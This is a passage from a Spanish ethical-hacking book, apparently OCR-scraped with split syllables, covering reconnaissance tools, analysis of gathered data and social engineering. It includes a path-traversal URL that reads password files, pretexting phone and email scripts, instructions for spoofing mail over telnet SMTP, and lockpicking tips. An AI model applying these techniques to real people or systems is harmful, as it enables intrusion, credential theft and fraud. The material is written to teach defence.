Dimitry. He rra mien ta pa ra en con trar da tos on li neso bre una de ter mi na da or ga ni za ción en In ter net.

Mó du lo Sear chen gi neDNS Pre dict: es un script en Perl que pre di ce nom bres DNS a tra vés de Goo gle.Fin ger Goo gle: es una uti li dad pa ra bus car usua rios de cuen ta me dian te Goo gle.Goog Mail Enum: es una uti li dad que nos permite bus car usua rios de cuen ta me -dian te Goo gle y do mi nios.Goo gle-search: script pa ra bus car en Goo gle des de la lí nea de co man dos.Goo gra pe: sir ve pa ra bus car en la Goo gle Hac king DB.Goos can: se uti li za pa ra en viar pe ti cio nes au to ma ti za das a Goo gle search ap plian -ces.

81

Si que re mos ob te ner más in for ma ción so bre el per fil que de be te ner un ofi cial de la se -gu ri dad in for má ti ca, en http://rfc .cu di.e du.mx /drafts /draft2.pdf, po de mos leer un do -cu men to más for mal en el que se de ta llan al gu nas de las res pon sa bi li da des, ha bi li da -des re que ri das y ob je ti vos.

Per fil del ofi cial de se gu ri dad in for má ti ca

Hacking Etico - [PDF Document] (85)

QGoo gle: rea li za pe ti cio nes a Goo gle des de pyt hon, re quie re una li cen cia vá li da.Re cur sos on li ne: ww w.allt he web .com, www .dog pi le .com, www .goo gle .com, www -.goo gle .com /hel p/o pe ra tors.html, ww w.in fo seek .com y www .kar too .com.

Mó du lo Sur veyRe cur sos on li ne: www .net craft .com.

Mó du lo WhoisRe cur sos on li ne: ww w.a fri nic .net, ww w.ap nic .net, ww w.a rin .net, ww w.in ter nic .net,www .lac nic .net, www .ni c.ar, www .ni c.uk, www .ri pe .net y www .sams pa de.org.

Otros live Cds orientados a seguridad:

www.isafe.gr/talos.html www.securitydistro.comwww.e-fense.com/helix www.linux-forensics.comwww.knoppix-std.org

Ana li zar la in for ma ción El ho ri zon te se abre co mo un aba ni co mien tras más in for ma ción se va re co pi lan -do acer ca de la or ga ni za ción ob je ti vo. Aun así, el ra ca ba do de in for ma ción si guemas allá de la eta pa ini cial, ex ten dién do se a ca da una de las eta pas pos te rio res delem ba te. Ca be des ta car que no se de ja de re co pi lar in for ma ción has ta que el tra ba -jo se ha lo gra do to tal o par cial men te. Mu chas ve ces, aún du ran te el che queo, se si -gue ob te nien do in for ma ción sus tan cial que pue de lle gar a dar nos pis tas pa ra in ten -tar otras co sas den tro del sis te ma, qui zás has ta re plan tear nos por qué sec tor de lain fraes truc tu ra cen trar nues tro es fuer zo o bien reor de nar com ple ta men te nues trapla ni fi ca ción, se cuen cia e in ten tos, a par tir de allí.

82

SQL (Struc tu red Query Lan gua ge) es un len gua je de pro gra ma ción que per mi te ac ce -der a ba ses de da tos re la cio na les pa ra al ma ce nar, ma ni pu lar y re cu pe rar los da tosque se en cuen tran en ellas. Pa ra ob te ner más in for ma ción so bre las ca rac te rís ti cas dees te len gua je, po de mos vi si tar, por ejem plo, el si tio http://sql .1key da ta .co m/es/.

SQL

Hacking Etico - [PDF Document] (86)

Un cla ro ejem plo de es to es cuan do ob te ne mos una shell en el ser vi dor ob je ti vo y,ac to se gui do, ve mos el con te ni do de los ar chi vos .bash _his tory, con to do el his to rialde los co man dos que eje cu tó el ad mi nis tra dor y al gu nos usua rios. Qui zá esa in for ma -ción cuen te has ta con la cla ve root ti pea da por error, o po da mos ver el fi che ro decon fi gu ra ción de red o las co ne xio nes es ta ble ci das con las re des y ter mi na les in ter -nas.Aho ra bien, ¿có mo po de mos ana li zar la in for ma ción ob te ni da pre via men te alata que? Eso es fá cil: una sim ple cues tión de aná li sis de ta lla do. Pre gun tar se pa raqué nos sir ve ca da da to es el pri mer pa so. A continuación veremos al gu nosejem plos de la uti li dad que tiene co no cer cier tos da tos.El nom bre de un em plea do de la or ga ni za ción: Pa ra de du cir el usua rio concuen ta shell en el sis te ma ope ra ti vo, una cuen ta de co rreo (u otro ser vi cio de au -ten ti fi ca ción), pa ra uti li zar in ge nie ría so cial en cual quie ra de sus ni ve les y for mas,pa ra ha cer re trie ve de al gún da to, am pliar el dic cio na rio al uti li zar al gu na téc ni ca debru te for ce, pa ra des cu brir al gu na car pe ta o do cu men to on li ne, de du cir al gún pass -word, com pro me ter lo pa ra ase gu rar se ac ce so con otra iden ti dad en el sis te ma, pa -ra con sul tar en otros am bien tes y ba ses de da tos, et cé te ra.Cuen tas de emails (lo gins): Si és tas coin ci den con el nom bre de las cuen tas de sis -te ma, se po drán uti li zar pa ra con se guir ac ce sos re mo tos a ser vi do res o ter mi na les.Tam bién pue den ser úti les a la ho ra de con se guir in for ma ción ins ti tu cio nal ma ne ja dapor el usua rio vía e-mail o bien prac ti car de ter mi na do che queo de pass words por de -fec to.La pla ta for ma: Sir ve pa ra ali near el che queo a di cha pla ta for ma y sus po si blesdes cui dos, ser vi cios y vul ne ra bi li da des. Vea mos un ejem plo muy bá si co del porqué sir ve co no cer bien la pla ta for ma o sis te ma ope ra ti vo. Su pon ga mos que enuno de los si tios de la or ga ni za ción (no so tros no sa be mos que es tá co rrien do so -bre el sis te ma ope ra ti vo FreeBSD) que re mos ver si un script en PHP que es támal pro gra ma do pue de lis tar el con te ni do de su ar chi vo (de sis te ma) passwd*,in gre san do es te URL en el brow ser:

http://www .si tio vic ti ma .com /fi le.php ?=../../../../passwd%00

Agre gar le eso al fi le.php es tá mal, por que al ser un sis te ma ope ra ti vo FreeBSD,su fi che ro passwd (tí pi co de Li nux) se lla ma mas ter .passwd, y es és te el query(pe ti ción http) co rrec to:http://www .si tio vic ti ma .com /fi le.php ?=../../../../mas ter .passwd%00

La can ti dad de /../ va ría se gún el sis te ma (Di rec tory trans ver sal is sue), la apli ca ción yel pro gra ma dor, al igual que el uso del ca rác ter NULL del fi nal %00, que pue de es tar ono.

83

Hacking Etico - [PDF Document] (87)

Un si tio web o sub do mi nio: Pa ra ana li zar lo minuciosamente en pri mer lu gar yaque és tos, me dian te pe ti cio nes http o es ca neo de vul ne ra bi li da des y puer tos, apor -tan mu chos da tos im por tan tes.Bac kup on li ne: Da tos sen si bles o no. Cla ro co no ci mien to de la exis ten cia de des -cui dos del ad mi nis tra dor por par te del in tru so. Bus ca rá to do aque llo que se in ten -te ase gu rar por ocul ta mien to.Agen tes ex ter nos (ni c.ar, ISP, pro vee do res, clien tes, et cé te ra): La in ter cep ción deés tos pue de brin dar in for ma ción muy sen si ble o bien, uti li za ble en el ob je ti vo.Una in tra ne t/ex tra net: Ex traer da tos in ter nos in te re san tes.Una car pe ta o ar chi vo ocul to: Pue de brin dar da tos.Te lé fo nos: Pa ra ha cer in ge nie ría so cial.Di rec cio nes: Pa ra ha cer in ge nie ría so cial, rea li zar IG en per so na o en la cer ca nía.Pass words: Ge ne rar re la ti vos co mu nes y pro bar los en to dos los ser vi cios de au -ten ti fi ca ción.Da tos per so na les: Pro bar los co mo pass words, usar los co mo in ge nie ría so cial.Una su cur sal: Bus car pun tos de in ter cep ción en la in fraes truc tu ra que va ha cia laca sa ma triz, in ge nie ría so cial on li ne o in si tu. Un ser ver o no do in ter me dio: Bus car com pro me ter lo pa ra interceptar in for ma -ción. Un ti po de re gla de fi re wall o IDS:Ma ne jar se con los pro to co los de bi dos pa -ra alu dir lo o de jar lo sin efec to me dian te la in cor po ra ción o mo di fi ca ción de las re glasac tua les.Pro to co los: Ali near téc ni cas, pla nea mien to y he rra mien tas al ob je ti vo.Ar qui tec tu ras: Ali near téc ni cas, pla nea mien to y he rra mien tas al ob je ti vo.Puer tos abier tos: Ex traer in for ma ción co mo ver sión, bus car de ter mi na do ti po deser vi cio, vul ne ra bi li da des exis ten tes o po si bles, ge ne rar erro res. Di rec ción IP: Tra tar de ubi car a la red de la or ga ni za ción en In ter net o al gún ob -je ti vo en par ti cu lar den tro de un tra ma do de re des in ter nas, ya sea ad mi nis tra ti va,ope ra ti va, de pro duc ción o de tes teo en ca so de que la tu vie ra.Un nom bre de host: sir ve pa ra tra tar de ubi car, en un ran go de IPs di ná mi cas, unade ter mi na da ter mi nal ob je ti vo, o ubi car un sec tor de la or ga ni za ción (re cor dar laster mi na les o PC lla ma das Re cep ción, Ge ren te, No te book o Con ta du ría).Cla se de an ti vi rus: Ali near bi na rios por eje cu tar pa ra que el mo tor de bús que da

84

En tre los pres ta do res de ser vi cios de co rreo elec tró ni co, po de mos en con trar dos queno de jan gra ba da nues tra di rec ción IP en la ca be ce ra de los e-mails en via dos des de supá gi na. Ellos son: Gmail (www.g mail .com) y Hush mail (www .hush mail .com). Tam biénpo seen otras in te re san tes fun cio nes de se gu ri dad.

E-mails sin di rec ción IP

Hacking Etico - [PDF Document] (88)

no los de tec te o bien sa ber qué an ti vi rus des ha bi li tar mo men tá nea men te o di rec ta -men te inu ti li zar lo.Un có di go fuen te: De si tio ins ti tu cio nal, de apli ca ción, e-mail, et cé te ra.Una ver sión de apli ca ción: Bús que da de vul ne ra bi li da des con cre tas.Unas po lí ti cas o pro ce di mien tos in ter nos: Si és tas po seen de ta lles de la in fraes -truc tu ra, la or ga ni za ción se en cuen tra en un gra ve pro ble ma por que mues tran ade -más el pro ce der de ella. Ge ne ral men te, se lo gra com pro me tien do el es ce na rio per -so nal de los en car ga dos (au di to res, con sul to res u ofi cia le s/ad mins de se gu ri dad in -for má ti ca). És tos sue len en viar in for ma ción con fi den cial a ca si llas fue ra de la ins -ti tu ción (per so na les) o bien al ma ce nar las en uni da des por tá ti les o hosts, des cen tra -li zán do las de su lu gar de ori gen y se gu ri dad.

La lis ta es tan vas ta (re cor de mos to dos los da tos que po de mos ob te ner me dian teel aná li sis de la ca be ce ra del co rreo elec tró ni co) co mo la mi nu cio si dad de quie nesrea li zan el che queo, re co lec tan do to do ti po de in for ma ción re la cio na da.Aho ra bien, ¿có mo ana li za re mos la in for ma ción que va ya mos con si guien do du ran -te esa emu la ción de ata que? Es to es im po si ble de an ti ci par, ya que los ob je ti vos sonto dos di fe ren tes y hay tan tas va rian tes o va ria bles de es ce na rios (y sus com po nen -tes) que se ne ce si ta rían va rios to mos so la men te pa ra dar una le ve idea. Las po si bi li da des, ni más ni me nos, son to das las ima gi na bles.De cual quier for ma, se pue den pre ver los fac to res es tá ti cos de los com po nen tesque co no ce mos de an te ma no. Co sas ta les co mo que, en ca so de que se lo gre unacuen ta shell en un ser vi dor Li nux, lo pri me ro que te ne mos que re vi sar son los.bash _his tory, las se sio nes, los pro ce sos, y to do aquel ar chi vo que nos dé in for -ma ción so bre la red, los usua rios (passwd) y el en tor no en ge ne ral.

Lo re co men da ble, una vez com pro me ti do el ob je ti vo co mo en es te ca so, es ana li -zar so bre la mar cha, ver si gra cias a ello se pue de lo grar más in for ma ción (en can -ti dad e im por tan cia) y to mar se el tiem po ne ce sa rio pa ra lo grar in ter pre tar la y dar leun co rrec to uso pa ra con ti nuar las si guien tes eta pas, si el fin así lo de man da.Un in tru so, por ejem plo, de ja rá co rrien do un snif fer ocul to co mo ds niff y vol ve -rá al ca bo de unos días a ver qué in for ma ción in te re san te cap tu ró pa ra con ti nuar ore plan tear su in tru sión. En cam bio, un pro fe sio nal éti co de be rá to mar no tas de to -das las vul ne ra bi li da des y des cui dos pa ra con fec cio nar un re por te de ta lla do.En sín te sis, la in for ma ción pre via al che queo y la ob te ni da du ran te él, son vi ta les ymuy re le van tes.

85

Hacking Etico - [PDF Document] (89)

86

www.securityfocus.com

SecurityFocus es actualmente propiedad de Symantec y aloja la famosa lista de seguridadBugtraq, entre otras como Forensics, pentest, securitybasics, IDS, Linux, Microsoft, Vul Dev,etcétera. En este portal de la seguridad, podemos encontrar columnistas, notas de primer nively herramientas de modo serio y actualizado.

www.sourceforge.net

Cuenta con casi dos millones de miembros y tiene alojados 3561 proyectos relacionados conseguridad informática. Es el sitio ideal para testear nuevas e innovadoras aplicaciones, tantopara Windows como para Linux y otros sistemas operativos. Los proyectos están nucleados en14 categorías, con tópicos como Networking, SysAdmin y Security entre los más interesantes.

Hacking Etico - [PDF Document] (90)

3 > Ingenieríasocial

Ingeniería social ligada a la seguridad

de la información. Veremos sus modos,

hacia quiénes va dirigida y el impacto

que llega a tener en la organización.

También conoceremos el modo en el que

se puede lidiar con este tipo de

técnicas y algunos casos reales con

ejemplos detallados.

Hacking Etico - [PDF Document] (91)

INTRODUCCIÓN A LA INGENIERÍA SOCIAL

El hombre padece los engaños desde tiempos remotos. Desde los antiguosmercaderes que vendían productos falsos, charlatanes de feria y hasta supuestosalquimistas que juraban convertir el plomo en oro. También hubo muchos conconocimientos de prestidigitación que se hacían pasar por magos para robar joyas;o regalos con sorpresa como el Caballo de Troya, hasta espías de ejército en laantigua China u otra poderosa potencia, que apelaban al engaño como recurso paraconseguir aquello que buscaban.La ingeniería social es un método basado en engaño y persuasión, utilizado paraobtener información significativa o lograr que la víctima realice un determinado

acto, como por ejemplo, ejecutar unarchivo que le llegó por e-mail, quereleve su contraseña por teléfonocuando se la solicitan o, por último, queesta persona incida sobre otra paraenviar datos hacia un lugar determinado.La ingeniería social apunta a explotar elfactor humano en la infraestructura de laorganización (considerado por muchosla parte más débil del sistema) y es unmétodo que puede llevarse a cabo através de canales tecnológicos (im-personal vía Internet o teléfono) o bienen persona, cara a cara, según la osadíade quien la comete o intente.A continuación, veremos los casostípicos de ingeniería social a través de unmedio tecnológico:

A. El utilizado por algunos worms msn(como por ejemplo W32.Posse): paralograr que nosotros hagamos click endeterminado link que nos envía a travésde un mensaje instantáneo, generado deforma automática. Con este fin, intentahacernos creer que son fotos de amigosy así logra infectarnos, entre otrasacciones.B. Los conocidos casos de phishing en

88

Regalo. Éste es el caballo de Troyautilizado en la película TTrrooyyaa, del año 2004.Gracias a este episodio histórico de guerra,se le dio el nombre de ttrrooyyaannooss a todos losarchivos supuestamente inofensivos que, alser ejecutados por el usuario, dejan unapuerta para el intruso en nuestra PC o

Hacking Etico - [PDF Document] (92)

los que llega un supuesto e-mail de nuestro banco para que coloquemos nuestrosdatos personales o login en determinado formulario online. De esa manera, eldelincuente los graba para finalmente extraer dinero de nuestra cuenta o vender losdatos al mejor postor. C. Las famosas postales electrónicas de invitación, saludos o amor enviadas por e-mail que, al abrirlas, nos requieren que coloquemos nuevamente el login de nuestrocorreo electrónico, para ser grabado por el intruso y asi poder acceder a nuestracuenta. Éstas se envían mediante los llamados lanzadores, desde sitios comowww.hackphreik.com o www.hackearhotmail.com, que no tienen nada que ver conla seguridad informática como allí dicen. Por eso, si vemos una tarjeta postalelectrónica de ese estilo, no debemos dudar en ignorarla y borrarla.

Gtalk. Este correo nos invita a descargar la aplicación GGttaallkk, peroen realidad es un link a un falso portal Gmail en el que se nos pedirá

nuevamente nuestra contraseña y usuario para que el intruso los obtenga fácilmente.

D. Del tipo trampa, como por ejemplo que nos dejen en nuestra oficina un CD con

89

Existe un libro especializado en el modo de engañar: The art of deception. Sus autoresson Kevin Mitnick y William Simon. Es recomendable leer, en especial, el capítulo de lasanécdotas y las recomendaciones de políticas para asegurar la información. Hay unasíntesis en www.microsiervos.com/archivo/libros/the-art-of-deception.html.

Libro recomendado

Hacking Etico - [PDF Document] (93)

programas ejecutables infectados, haciéndolos pasar como inocentes. Por otrolado, que nos hagan llegar un link que, a través de un sitio con XSS (cross sitescripting), al dar clic en él nos robe la cookie de sesión que está en nuestra PC paraluego hacernos un robo de sesión. Esta técnica (que detallaremos más adelante) esutilizada para entrar a nuestra cuenta de webmail sin conocer la clave. E. Casos relacionados con servicios de hosting (páginas webs): engaño aladministrador del hosting en el que el intruso pide que se le dé un espacio paraprobar o comprar el servicio donde luego sube un script-shell en PHP o ASP y,acto seguido, puede ver los códigos fuente de otras páginas en ese mismo servidoro proveedor, mapear su red interna e intentar otras cosas. Otro caso común es elde hacerse pasar por el dueño del sitio para que haga el favor de reemplazar el e-mail de registro y reenviar la clave ftp o del panel de administración a esa cuenta.Ese tipo de intenciones engañosas e inducción se conoce en la seguridad de lainformación como ingeniería social y puede estar dirigida hacia cualquiera de losempleados de una organización, ya sea desde la primera recepcionista hasta elgerente general o alguno de los agentes relacionados. Ahora veamos las formastípicas que adopta y las características de este tipo de engaño.

El trabajo de ingeniería social puede estar dirigido a:

• Una organización objetivo.• Una organización al azar.• Determinado empleado.• Un grupo de empleados. • Un usuario.• Todo aquel relacionado con éstos.

El contacto realizado es hecho supuestamente por:

• Prestador/a de servicios.• Conocido, amigo o pariente de alguien. • Autoridad.

90

Hay quienes sugieren comportarse de modo paranoide para estar a salvo, pero eso noes bueno. Debemos ser algo desconfiados y acatar las normas, pero no ser delirantes.Quien esté tan dedicado a pensar en un enemigo fantasma, pondrá en riesgo elescenario y hará perder la dinámica del sistema con medidas innecesarias y extremas.

Paranoia improductiva

Hacking Etico - [PDF Document] (94)

• Colega de otro sector o sucursal. • Anónimo.• Impersonalizado.

Movie. En DDuurroo ddee mmaattaarr 44..00, hay una escena de ingenieríasocial (minuto 57) llevada a cabo para robar un auto. Luego de activar los airbargs

a golpes para que la central del sistema OOnnSSttaarr se comunicara, JustinLong, interpretando a un hacker, convence a la operadora de encender el auto

con la excusa de ir a un hospital luego de colisionar. En wwwwww..oonnssttaarr..ccoomm//uuss__ssppaanniisshh//jjsspp//eexxpplloorree//oonnssttaarr__bbaassiiccss//tteecchhnnoollooggyy..jjsspp, encontramos el funcionamiento del sistema.

En modo:

• Casual.• Directo: consulta inocente y típica, haciendo firmar entrega de regalo, encuesta,completar planillas, etcétera.

• Indirecto: involucrando terceros ficticios o reales sin su conocimiento.• Trampa directa e indirecta: envío de correo con material en CD, suplantación dependrive, etcétera.

• Invasivo: acceso a recintos, irrupción dentro de oficina con o sin utilización delockpicking, instalación de hardware espía (recolector o transmisor de datos).

91

Si deseamos probar el envío de e-mails con remitentes falsos en Windows, debemosinstalar un servidor SMTP para la PC (www.softstack.com/download/freesmtp.zip) ycrear una cuenta en Outlook en la que la configuración de servidor smtp será localhost(en caso de llegar al límite de diez envíos por día, podemos cambiar la fecha).

Enviar e-mails spoofeados

Hacking Etico - [PDF Document] (95)

Lockpicking, es el arte de abrir cerraduras sin llave y sin romperlas. En la próximafigura, podemos ver dos cerraduras típicas, muy comunes en recintos ejecutivosdonde se guardan backups en medios ópticos (respaldos de información en CDo DVD) o legajos de papel en carpeta.

Opened. Aqui les muestro como abrí manualmente dos cerraduras muy comunes. La primeracerradura es de 4 pins, muy usada en armarios para ficheros, y la segunda es de 3 pins,

típica de cajoneras.

Para abrirlas, se puede utilizar un alambre acerado del interior de una escobillalimpiaparabrisas como elemento de tensión, y como ganzúa una hoja de sierramoldeada con amoladora. Se pueden ver más detalles acerca de esta técnica (e interesante hobby) en www.lockpickingsport.com o www.lockpicking.es.

Variedad. Diferentes tipos de ppiicckkss o ganzúas utilizadas para abrir cerraduras.

92

Hacking Etico - [PDF Document] (96)

A través de los medios:

• Cara a cara con protagonista: Mediante diálogo.

• De carácter secundario: Como empleado de correo o cadetería.

• E-mail: Todas las formas imaginables, algunas detalladas más adelante.

• Teléfono, impersonal: Diálogo.

• Fax: Enviando documentos con requerimientos de modificación de datos (casowww.nic.ar, hostings) o con información sensible.

• Medios y agentes combinados: por ejemplo, el intruso envía un e-mail de unsupuesto superior de una sucursal, avisando a la recepcionista de otra sucursalque en unos momentos va a pasar alguien a recoger un dato o determinadainformación para que se la tenga preparada.

Fin del acto:

• Información: busca pequeñas pistas o datos para planificar el embate.• Acciones: busca generar determinadas acciones.

Ingeniería social +information gathering

Aún sin el suficiente conocimiento técnico como para cometer una intrusión através de la seguridad de red (firewalls, IDS, control de accesos), un manipuladorhábil puede lograr su ingreso recabando información mediante algunas llamadastelefónicas o e-mails. ¿Cómo? Obteniendo los datos de un usuario legítimo a travésde una previa recolección de información interna sobre procedimientos, datosconcretos (tipos de formularios o códigos) y nombres.

El intruso informático seguramente va a buscar información utilizando ingenieríasocial y por eso es tan importante, tanto para una organización como para nosotros-usuarios de internet-, tratar de no dar información confidencial o personal aextraños. Y ante algún suceso inesperado (como recibir una consulta de undesconocido o haber encontrado un pendrive en su escritorio), deberíamosdesconfiar.

¿Qué hace tan riesgoso al embate de un ingeniero social?

93

Hacking Etico - [PDF Document] (97)

• Éste adopta la identidad que desea o la suplanta.

• Ajusta la retórica o su modo de comunicarse al receptor, a sus sentimientos y asu rol dentro de la organización formal.

• Genera la trama o excusa que conviene a su propósito.

• Hace interactuar personajes reales y ficticios entre sí.

• Expone a su víctima a trampas, voluntades de ayuda, seducción y preocupación contal de obtener cierto dato o una acción precisa (o desencadenamiento de actos).

Caos. En su sitio web, CCC enseña como extraeruna huella digital de un tercero para utilizarla en mecanismos

biométricos de autentificación y de esa manera suplantar una identidad.

Hoy en día, con la actual expansión de Internet, el intruso que desea haceringeniería social cuenta con muchos recursos. Hay fuentes casi públicas deinformación ejecutiva en los círculos sociales o de contactos profesionales comoLynkedin, en el cual alguien puede publicar un currículum vítae muy interesante anombre de cualquiera y, desde allí, ponerse a contactar con gente cercana a laorganización objetivo o componentes de ésta.

94

Hacking Etico - [PDF Document] (98)

Relaciones. Una red social como Linkedin (wwwwww..lliinnkkeeddiinn..ccoomm) es útil parahacer ingeniería social ya que muestra los contactos de una persona, aunque ¿cómo

sabremos efectivamente que el perfil que vemos allí pertenece realmente a la persona?

Ejemplos A continuación, veremos algunos ejemplos sobre cómo utilizar las técnicas queconocimos hasta aquí. Éstas son formas en las que un intruso podría llevar a cabo su embate para obtenerinformación de nuestra empresa y como profesionales de la seguridad, debemosconocerlas a fondo para intentar evitarlas.

95

Una consultora hizo un chequeo de seguridad de una organización con hincapié eningeniería social. Para eso, los profesionales dejaron olvidados 20 pendrives conarchivos que, al ser ejecutados, enviaban información de la organizacion hasta susmáquinas. La trampa fue efectiva con 15 empleados de la organización.

Anécdota

Hacking Etico - [PDF Document] (99)

Ingeniería social vía teléfono

En estos días, el teléfono es un medio que permite la suplantación de identidad (porquien está del otro lado) y es muy utilizado por quien practica ingeniería social.Veamos un ejemplo de cómo puede ser utilizado.

El ingeniero social llama a una sucursal (previa tarea de haber buscado un númeroen la guía telefónica, la industrial, internet o mediante el aporte de otro empleadou otro recurso de datos) de la empresa objetivo y dice algo como:

–Buenos días, lo llamo desde casa matriz, soy Juan Pérez del departamento decalidad, y me gustaría hablar con el encargado de producción. ¿Con quién tengo elgusto de hablar?

Ése es, quizás, el primer approach (acercamiento, inicio de la ofensiva) pararecabar nombres, comenzando por el de una recepcionista en caso de que no seconociera nadie allí dentro.

–¿Sería tan amable de recordarme el correo electrónico del gerente de producción?Debo enviarle esta tarde un informe de calidad, es importante. No llegamos atiempo para llevárselo y lo está esperando, es medio urgente.

Éste es el factor que pretende generar ayuda en el otro, no sólo para recabar datos.Lo está esperando es un disparador de conciencia, algo que le hará creer a lasecretaria que, si no ayuda, muy posiblemente tenga una llamada de atención p*rno haberlo hecho. Además de recabar información por teléfono, veamos cómopueden ser los e-mails para continuar este caso.

–Mil gracias, Agustina, te enviaré copia por si me viene devuelto. ¿Lo hago [emailprotected]?

96

Uno de los casos de ingeniería social más conocidos mediante spam es el fraude delnigeriano. Podemos encontrar un interesante relato acerca de este engaño enwww.elpais.com/articulo/portada/fraude/nigeriano/elpeputeccib/20061123elpcibpor_3/Tes.

Ejemplo conocido

Hacking Etico - [PDF Document] (100)

Con esta frase, inicia confianza y cae agradable, y muy posiblemente la persona ledé el e-mail personal institucional. Acto seguido, el ingeniero social deja pasar unpar de días y escribe al e-mail del gerente de producción:Estimado Sr. García: le escribo para solicitarle el último informe sobre producción.Si es posible, ¿sería tan amable de dejárselo a Agustina? Yo iré personalmente esta tarde a buscarlo. Desde ya, muchas gracias. Atte.Juan PérezDto. Calidad Casa MatrizResto de la firma con direcciones y teléfonos.

Imaginemos que este correo lo recibe un gerente de producción, supuestamentecontactado por un nuevo agente de calidad que quiere conocer su trabajo y es dela casa matriz (principal) de la empresa. Mientras espera una respuesta por parte del gerente (quien al ver que nombra a larecepcionista con naturalidad tendrá mas confianza en el texto, que será másconvincente si figuran estas piezas), de ser ésta positiva o al menos dudosa, esteingeniero social llamará de nuevo a Agustina solicitándole el informe faxeado oreenviado a su e-mail, ya que es muy probable que no vaya en persona y se lasingenie para conseguirlo de modo impersonal o a través de un tercero.

El modo de abordar el caso podría ser más sutil aún. Las situaciones sonnumerosas por la cantidad de posibles variantes y personalidades involucradas.Es importante planificar una política interna acerca de los canales decomunicación que contemple la descentralización de información institucional,su modo de envío cifrado y sus responsables. Otro de los casos más típicos esel llamado del empleado al usuario común de la empresa.

–Hola Agustina. Te llamo de Sistemas, soy Diego Pérez. ¿Podrías ayudarme unsegundo? Estamos mejorando el tema del correo electrónico en la empresa y tengoque generar un archivo de tu cliente de correo. Son dos pasos solamente. ¿Estáscon la máquina encendida?–Eh. Hola, sí.–Abrí Outlook por favor, andá a Herramientas, luego a Cuentas...

No hace falta mucho guión para hacerle exportar a una secretaria sin muchosconocimientos de PC el archivo .iaf de su cuenta y hacer que lo envíe pararevisarlo. Este archivo posee toda la configuración de la cuenta de e-mail deOutlook, incluso password, servidor SMTP y POP3, etcétera.También debemos tener en cuenta que desde teléfonos celulares se pueden llevar acabo variadas acciones relacionadas con ingeniería social, como enviar páginasmediante mensajes de texto, e-mails, llamadas o conectarse a mensajeros

97

Hacking Etico - [PDF Document] (101)

instantáneos.

Audio. En la actualidad, el vvooiiccee mmoorrpphhiinngg (deformación de voz) a travésde software permite suplantar identidades gracias a la complejidad que poseen

este tipo de aplicaciones. Por ejemplo, un señor puede lograr la voz de una señorita.

Ingeniería social vía fax

Muchos dominios han sido usurpados mediante fax. Hace tiempo, esto les pasó alos creadores de una conocida E-zine española, como a otros tantos aquí gracias aPhotoshop y un escaneo de documento de identidad, faxeado con una simple nota.Un muy buen artículo sobre el tema se encuentra en www.bufetalmeida.com/133/usurpacion-de-dominios-y-derecho-penal.html (sitio de abogados españoles con

98

Se denomina Hacking Bluetooth a lo que sucede cuando la agenda de contactos delcelular es comprometida. Ésta suele brindar muchos datos para realizar ingenieríasocial de alta credibilidad. Si nuestro celular tiene este servicio, conviene deshabilitarlowww.security-hacks.com/2007/05/25/essential-bluetooth-hacking-tools.

Celulares comprometidos

Hacking Etico - [PDF Document] (102)

mucha experiencia en casos de intrusión y delitos informáticos).El engaño consiste, simplemente, en hacer un reclamo mediante fax a la instituciónque maneja el dominio a nombre del actual y real propietario solicitándole algúncambio de dato de registro u otro dato que permita luego utilizarlo pararedireccionarlo hacia cualquier IP de Internet.

En la página de preguntas frecuentes de Nic.ar (www.nic.ar/faq3.html), podemosver el modelo de nota (formato) que detallan para el fax. Así, un simple fax puededejar a una organización sin su plataforma de comunicación y marketing online obien, puede utilizarse para otros delitos informáticos que no vamos a detallar eneste libro. En este caso, el ingeniero social se expone a falsificación de documentopúblico (lo cual está penado) y a otras cosas, y depende de la organización que estédetrás del dominio en cuestión y de la reacción de ésta en caso de ser víctima.

Ingeniería social vía mensajeros instantáneos

El mensajero instantáneo es un medio con mucha llegada al usuario común,aunque en épocas anteriores no había tanta gente conectada como sucede ahoracon MSN Live. Suplantar la identidad en MSN es relativamente fácil y los mensajespueden utilizarse de diversas formas:

• Se le puede inventar alguna historia.• Se puede enviar archivos directamente.• Se puede pasar un link de página (ésta puede tener archivos infectados o linkshacia archivos ejecutables, o algo que le saque determinada cookie o una imagenque deja el log de la dirección IP de la víctima).

Para hacerlo, se agrega la persona a la lista de contactos y se le envía el mensaje conel link en estilo informal como:

“Hola capo, estoy desde la cuenta de mi prima, te paso la página que te conté, estoyllegando de viaje mañana a casa. Saludoshttp://www.sitiomalicioso.com”

99

Si queremos conocer la explicación de Microsoft sobre lo que significa la ingenieríasocial, podemos visitar www.microsoft.com/Spain/athome/security/email/socialengineering.mspx. En esa página encontraremos las recomendaciones y lassoluciones de la empresa.

Ingeniería social según microsoft

Hacking Etico - [PDF Document] (103)

Ingeniería social vía e-mailEl e-mail es el principal canal de ingeniería social en estos días. Lo utilizan losestafadores, los spammers, los intrusos y los gusanos (programas que, al serejecutados por el usuario o habiendo ingresado en nuestro sistema por algúnservicio vulnerable, infectan la máquina para luego enviar un e- mail a todos losmiembros de nuestra lista de contactos. Por ejemplo, VBS/LoveLetter worm).Recordemos que el e-mail permite suplantación de la identidad (el que dice que esanónimo, no conoce los medios de intercepción y rastreo). El e-mail posee tres particularidades interesantes para combinar con la ingenieríasocial:

• Se puede falsear el remitente (sender o quien lo envía). Veamos un ejemplo decómo enviar un e-mail con remitente inventado:

shell>telnet IP 25 // conecta al servidor smtp mediante telnet

Trying IP, 25 ... Open220 smtpx.xxxxxx.com.ar ESMTP// conecta al smtphelo PC4// saludamos con eso, PC4 es nuestro nombre de host250 smtpx.xxxxxx.com.armail from: [emailprotected]// Quien envía250 okrcpt to: [emailprotected]// Quien recibe250 okdata // Anunciamos cuerpo del mensaje

354 go aheadX-Mailer: amano v2.0Message-ID: 34235

100

www.telecable.es/personales/carlosmg1/historia_correo.htm es un sitio dondepodemos encontrar la historia del correo electrónico en español. Entre otras cosas, lapágina cuenta cómo los usuarios de sistemas dejaron de pasarse archivos con textohacia carpetas para luego enviarse mensajes entre máquinas con este nuevo estándar.

Historia del correo electrónico

Hacking Etico - [PDF Document] (104)

to: [emailprotected]: [emailprotected]: Testeando envio de mails a mano.Hola, esto es una prueba via telnet.// Mensaje.// Escribimos un punto y

damos enter para terminar.

250 ok 289736235443 qp 2343864quit221 smtpx.xxxxxx.com.ar[Connection to IP closed by foreign host] // Se desconecta...

Así se vería el código fuente del mensaje que nos llegó:

Received: from smtpx.xxxx.com.ar (smtpx.xxxx.com.ar) by IP-pop3 (7.9.3/7.9.3) with SMTP id MAA12494 for < [emailprotected] >; Tue, 8 Jan 2007 00:00:00 +0900 (KST)

Received: (qmail 2243 invoked from network); 8 Jan 2007 00:00:00 -0000Received: from unknown (HELO PC4 ) (IP desde donde se ejecutó el cliente

